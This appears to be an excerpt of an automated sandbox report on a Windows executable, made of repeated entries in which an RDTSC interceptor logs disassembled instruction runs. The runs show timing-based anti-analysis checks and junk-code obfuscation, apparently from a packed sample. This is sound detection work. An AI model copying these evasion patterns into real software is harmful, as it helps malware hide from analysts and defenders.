Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9A8 second address: 36F9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9AC second address: 36F9B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F19 second address: 371F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4688C929E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F31 second address: 371F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F56 second address: 371F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371F60 second address: 371F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371D10 second address: 371D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 371D16 second address: 371D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 373578 second address: 37359E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C929E4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F4688C929DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37359E second address: 3735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37578E second address: 375796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3727FB second address: 3727FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 375796 second address: 3757A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3732DF second address: 3732E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3757A4 second address: 3757A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3732E5 second address: 3732EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA49 second address: 37AA4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA4E second address: 37AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B778h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA73 second address: 37AA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AF93 second address: 37AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4688C1B768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3A74h] 0x0000002a push 00000000h 0x0000002c mov di, cx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F4688C1B776h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BDEC second address: 37BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F4688C929EAh 0x0000000c pushad 0x0000000d jmp 00007F4688C929DCh 0x00000012 jnc 00007F4688C929D6h 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D38AEh], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4688C929D8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov bx, di 0x00000040 push 00000000h 0x00000042 or edi, 539C45E0h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37B149 second address: 37B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BE4C second address: 37BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37B14E second address: 37B153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BF9C second address: 37BFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4688C929D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37D103 second address: 37D10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37DFD9 second address: 37E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4688C929E9h 0x0000000d jg 00007F4688C929D8h 0x00000013 popad 0x00000014 nop 0x00000015 or dword ptr [ebp+122D2828h], edx 0x0000001b mov bh, E6h 0x0000001d push 00000000h 0x0000001f jnc 00007F4688C929DCh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4688C929D8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 movsx edi, si 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pop edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37F02F second address: 37F035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37F035 second address: 37F04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38240F second address: 382441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4688C1B76Fh 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F4688C1B766h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 382441 second address: 38246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 383A60 second address: 383A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 384BE6 second address: 384BEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 383C89 second address: 383C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 385CC7 second address: 385D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4688C929E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F4688C929D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 384E1C second address: 384EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F4688C1B768h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F4688C1B768h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c adc bl, FFFFFFE6h 0x0000004f mov eax, dword ptr [ebp+122D0995h] 0x00000055 stc 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4688C1B778h 0x0000005d jmp 00007F4688C1B76Ah 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jng 00007F4688C1B766h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 386CB6 second address: 386CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 388AB0 second address: 388AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4688C1B768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xor ebx, 5F64974Fh 0x00000029 push 00000000h 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12454D8Eh], edi 0x00000036 mov edi, 719258C0h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389B5D second address: 389B73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f je 00007F4688C929D6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 385E9F second address: 385F40 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c or dword ptr [ebp+12449AABh], ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007F4688C1B775h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F4688C1B768h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov bx, 70B8h 0x00000043 mov eax, dword ptr [ebp+122D06B1h] 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4688C1B768h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push FFFFFFFFh 0x00000065 or dword ptr [ebp+12461125h], ebx 0x0000006b mov edi, dword ptr [ebp+122D3ACCh] 0x00000071 push eax 0x00000072 pushad 0x00000073 push edi 0x00000074 ja 00007F4688C1B766h 0x0000007a pop edi 0x0000007b push eax 0x0000007c push edx 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CE0 second address: 389CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CE6 second address: 389CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38C88B second address: 38C895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CFE second address: 389D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38C895 second address: 38C901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3628h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4688C929D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, 1DB538E4h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F4688C929D8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f jo 00007F4688C929E4h 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007F4688C929D6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38ABFC second address: 38AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C010 second address: 32C01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C01D second address: 32C023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C023 second address: 32C037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C037 second address: 32C03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393861 second address: 393865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39399C second address: 3939B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939B4 second address: 3939C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4688C929DAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939C6 second address: 3939CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939CC second address: 3939D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939D2 second address: 3939D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939D6 second address: 3939EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F4688C929D6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939EC second address: 3939F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939F2 second address: 393A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4688C929E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393B24 second address: 393B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F4688C1B775h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393B45 second address: 393B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4688C929DFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3982FD second address: 398301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 398301 second address: 398329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4688C929DAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B67C second address: 39B686 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B686 second address: 39B697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B73D second address: 39B743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B816 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 233A3087h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 jmp 00007F4688C929E9h 0x0000001a popad 0x0000001b push dword ptr [ebp+122D02D1h] 0x00000021 cmc 0x00000022 call dword ptr [ebp+122D34DBh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jmp 00007F4688C929E9h 0x0000003b mov dword ptr [ebp+122D3B28h], eax 0x00000041 add dword ptr [ebp+122D1AD8h], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c mov dword ptr [ebp+122D1AD8h], esi 0x00000052 mov dword ptr [ebp+122D1AD8h], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c clc 0x0000005d lodsw 0x0000005f clc 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 or dword ptr [ebp+122D1AD8h], ebx 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e jmp 00007F4688C929DCh 0x00000073 nop 0x00000074 pushad 0x00000075 push edx 0x00000076 jmp 00007F4688C929DAh 0x0000007b pop edx 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F4688C929E8h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08F2 second address: 3A08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08F8 second address: 3A08FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08FE second address: 3A0902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A01DA second address: 3A01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A0630 second address: 3A063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A063A second address: 3A063E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A505B second address: 3A5060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5060 second address: 3A5066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5066 second address: 3A506A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
